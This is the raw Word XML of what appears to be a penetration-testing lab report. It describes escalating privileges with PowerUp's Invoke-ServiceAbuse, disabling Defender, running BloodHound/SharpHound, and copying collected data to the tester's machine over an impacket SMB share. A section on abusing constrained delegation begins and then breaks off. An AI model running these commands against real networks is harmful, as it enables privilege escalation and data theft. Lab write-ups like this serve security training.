    <w:p w14:paraId="38EE1925" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00336227" w:rsidP="00336227"/>
    <w:p w14:paraId="21476D52" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00336227" w:rsidP="00336227">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50363BEA" wp14:editId="4BA55FC4">
            <wp:extent cx="6083300" cy="30955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429" cy="31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A433" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00336227" w:rsidP="00336227"/>
    <w:p w14:paraId="5A5D2852" w14:textId="77777777" w:rsidR="00336227" w:rsidRDefault="00B05055" w:rsidP="00B05055">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">PowerUp began working when I used a command called </w:t>
      </w:r>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Invoke-AllChecks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>. This command runs various checks provided by the module and gives us information about potential security issues, especially those related to gaining more control or abusing privileges on a computer system.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B05055">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">One of the checks performed by PowerUp was looking at services on the system that had weak permissions. It identified a service called </w:t>
      </w:r>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>VDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> as having such weak permissions. At this point, I used a function called </w:t>
      </w:r>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Get-ModifiableService</w:t>
      </w:r>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> to make changes. Specifically, I added my current domain user account to the local Administrators group, which gave me more control and privileges on the computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E0ABEE" w14:textId="77777777" w:rsidR="00B05055" w:rsidRDefault="00B05055" w:rsidP="00B05055">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Invoke-ServiceAbuse -Name vds -UserName </w:t>
      </w:r>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>‘tech\studentuser'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403090A5" w14:textId="77777777" w:rsidR="00B05055" w:rsidRDefault="00B05055" w:rsidP="00B05055"/>
    <w:p w14:paraId="2229D2D9" w14:textId="77777777" w:rsidR="00B05055" w:rsidRDefault="00B05055" w:rsidP="00B05055">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B05055">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Now to check the member of Administrators group , I can see studentuser  there. It shows that now studentuser has localadmin privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A9E8E" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57D78">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">net localgroup </w:t>
      </w:r>
      <w:r w:rsidRPr="00F57D78">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Administrators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F1919E" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78"/>
    <w:p w14:paraId="6F6C20AE" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2257C14A" wp14:editId="1B9EFA9E">
            <wp:extent cx="5943600" cy="2893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9B97" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D0144DC" wp14:editId="74BB6E01">
            <wp:extent cx="5943600" cy="2893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A461" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78"/>
    <w:p w14:paraId="199603BE" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRPr="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1A5615" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55782482" wp14:editId="7D1D6AB6">
            <wp:extent cx="5943600" cy="2893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371A" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Now I try to open a powershell session with Administrative privileges using studentuser creds and succeeded </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FFA142" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C93C000" wp14:editId="7B39B1D0">
            <wp:extent cx="5943600" cy="2893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3F64" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">After opening the powershell session with Administrative privileges, first thing I do is to disable Defender so that it </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F57D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>wont</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F57D78">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> get in the way later on.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE8DB5" w14:textId="77777777" w:rsidR="00F57D78" w:rsidRDefault="00F57D78" w:rsidP="00F57D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677577" wp14:editId="6F124EA3">
            <wp:extent cx="5943600" cy="2893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434E" w14:textId="77777777" w:rsidR="002B2926" w:rsidRDefault="002B2926" w:rsidP="00F57D78">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05D5C634" w14:textId="77777777" w:rsidR="002B2926" w:rsidRDefault="002B2926" w:rsidP="002B2926">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc146476881"/>
      <w:bookmarkStart w:id="7" w:name="_Toc146477315"/>
      <w:r w:rsidRPr="002B2926">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>MGMT-SRV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="75217B93" w14:textId="77777777" w:rsidR="002B2926" w:rsidRDefault="002B2926" w:rsidP="002B2926"/>
    <w:p w14:paraId="208EA992" w14:textId="77777777" w:rsidR="00732918" w:rsidRDefault="00732918" w:rsidP="00732918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6476882"/>
      <w:bookmarkStart w:id="9" w:name="_Toc146477316"/>
      <w:r w:rsidRPr="00732918">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Running Blood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h</w:t>
      </w:r>
      <w:r w:rsidRPr="00732918">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ound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8"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1C0C0090" w14:textId="77777777" w:rsidR="00732918" w:rsidRDefault="00732918" w:rsidP="00732918"/>
    <w:p w14:paraId="137E4279" w14:textId="77777777" w:rsidR="00732918" w:rsidRDefault="00732918" w:rsidP="00732918">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00732918">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>To discover potential attack routes in the network, I placed the SharpHound.ps1 script into the memory of the studentvm computer. Then, I used Bloodhound tools to collect data and details about the existing domain. After that, I ran bloodhound once more to gather additional information about active user sessions in the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC8CB3C" w14:textId="77777777" w:rsidR="00732918" w:rsidRPr="00732918" w:rsidRDefault="00732918" w:rsidP="00732918">
      <w:pPr>
        <w:pStyle w:val="Heading6"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00732918">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Invoke-Bloodhound -CollectionMethod all -</w:t>
      </w:r>
      <w:r w:rsidRPr="00732918">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B29AE3D" w14:textId="77777777" w:rsidR="002B2926" w:rsidRDefault="00732918" w:rsidP="002B2926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00732918">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Invoke-Bloodhound -CollectionMethod LoggedOn -Verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E344D" w14:textId="77777777" w:rsidR="00732918" w:rsidRDefault="00732918" w:rsidP="002B2926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50F93527" w14:textId="77777777" w:rsidR="00732918" w:rsidRDefault="00732918" w:rsidP="002B2926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</w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C5FBF86" wp14:editId="70433857">
            <wp:extent cx="5943600" cy="2893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0871" w14:textId="77777777" w:rsidR="00732918" w:rsidRDefault="00732918" w:rsidP="002B2926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55458069" w14:textId="77777777" w:rsidR="00732918" w:rsidRDefault="00732918" w:rsidP="002B2926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noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DD55871" wp14:editId="5CAEC42F">
            <wp:extent cx="5943600" cy="2893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202C" w14:textId="77777777" w:rsidR="00732918" w:rsidRPr="00732918" w:rsidRDefault="00732918" w:rsidP="00A47787">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00732918">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Once the data is collected, I transferred the zip files to my machine by opening an SMB server on my machine using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774B24A1" w14:textId="77777777" w:rsidR="00732918" w:rsidRDefault="00732918" w:rsidP="002B2926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00732918">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>impacket-smbserver temp .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C91CDE" w14:textId="77777777" w:rsidR="00732918" w:rsidRPr="00A47787" w:rsidRDefault="00A47787" w:rsidP="00A47787">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>And then running following command on studentuser machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7665252C" w14:textId="77777777" w:rsidR="00A47787" w:rsidRDefault="00A47787" w:rsidP="002B2926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A47787">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">copy c:\Users\studentuser\Desktop\&lt;filename&gt;.zip </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="00536CD4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:b/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>\\172.16.99.11\temp</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="214FEF7D" w14:textId="77777777" w:rsidR="00A47787" w:rsidRDefault="00A47787" w:rsidP="002B2926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12A35479" w14:textId="77777777" w:rsidR="00A47787" w:rsidRDefault="00A47787" w:rsidP="002B2926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EEC5311" w14:textId="77777777" w:rsidR="00A47787" w:rsidRDefault="00A47787" w:rsidP="002B2926">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37A936CF" wp14:editId="71A88713">
            <wp:extent cx="5943600" cy="2893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73FD" w14:textId="77777777" w:rsidR="00A47787" w:rsidRDefault="00A47787" w:rsidP="002B29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got the zip files on my machine successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DD8F51" w14:textId="77777777" w:rsidR="00A47787" w:rsidRDefault="00A47787" w:rsidP="002B29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52E8F9" wp14:editId="2CC08913">
            <wp:extent cx="5943600" cy="2893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1188" w14:textId="77777777" w:rsidR="00A47787" w:rsidRDefault="00A47787" w:rsidP="002B29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5777F7" wp14:editId="43A2254F">
            <wp:extent cx="5943600" cy="28930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78F5" w14:textId="77777777" w:rsidR="00A47787" w:rsidRDefault="00A47787" w:rsidP="00A4778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47787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>I uploaded the collected information to Blood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A47787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">ound and claimed ownership of my "studentvm" machine. When I checked the "Shortest Path from owned Principles" section, I found that my </w:t>
      </w:r>
      <w:r w:rsidRPr="00A47787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">studentvm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A47787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AllowedToDelegate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A47787">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mgmtsrv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7E560DB7" w14:textId="77777777" w:rsidR="00A47787" w:rsidRDefault="00A47787" w:rsidP="00A4778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E7E14CD" wp14:editId="05F0D2CB">
            <wp:extent cx="6453832" cy="3540868"/>
            <wp:effectExtent l="0" t="0" r="444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429" cy="355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26F5" w14:textId="77777777" w:rsidR="00B16534" w:rsidRDefault="00B16534" w:rsidP="00A4778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385A0C" w14:textId="77777777" w:rsidR="00B16534" w:rsidRDefault="00B16534" w:rsidP="00A4778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E35E6B" w14:textId="77777777" w:rsidR="00B16534" w:rsidRDefault="00B16534" w:rsidP="00A4778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AA0377" w14:textId="77777777" w:rsidR="00B16534" w:rsidRPr="00B16534" w:rsidRDefault="00B16534" w:rsidP="00B16534">
      <w:pPr>
        <w:pStyle w:val="Heading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_250010"/>
      <w:bookmarkStart w:id="11" w:name="_Toc146476883"/>
      <w:bookmarkStart w:id="12" w:name="_Toc146477317"/>
      <w:r w:rsidRPr="00B165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onstrained</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16534">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-16"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidRPr="00B16534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Delegation:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="5353C8D7" w14:textId="77777777" w:rsidR="00B16534" w:rsidRDefault="00B16534" w:rsidP="00B16534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="504CCD6D" w14:textId="77777777" w:rsidR="00B16534" w:rsidRDefault="00B16534" w:rsidP="00B165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you have an account or computer with constrained delegation privilege, it is possible to impersonate any other user and authenticate yourself to a service where the user is allowed to delegate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71A8F6" w14:textId="77777777" w:rsidR="00A93EAF" w:rsidRDefault="00B16534" w:rsidP="00A93EAF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46476884"/>
      <w:bookmarkStart w:id="14" w:name="_Toc146477318"/>
      <w:r w:rsidRPr="00B16534">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Abusing Constrained Delegation:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="7C6BC173" w14:textId="77777777" w:rsidR="00A93EAF" w:rsidRPr="00A93EAF" w:rsidRDefault="00A93EAF" w:rsidP="00A93EAF"/>
    <w:p w14:paraId="4CE9620C" w14:textId="77777777" w:rsidR="00A93EAF" w:rsidRDefault="00A93EAF" w:rsidP="00B16534">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A93EAF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
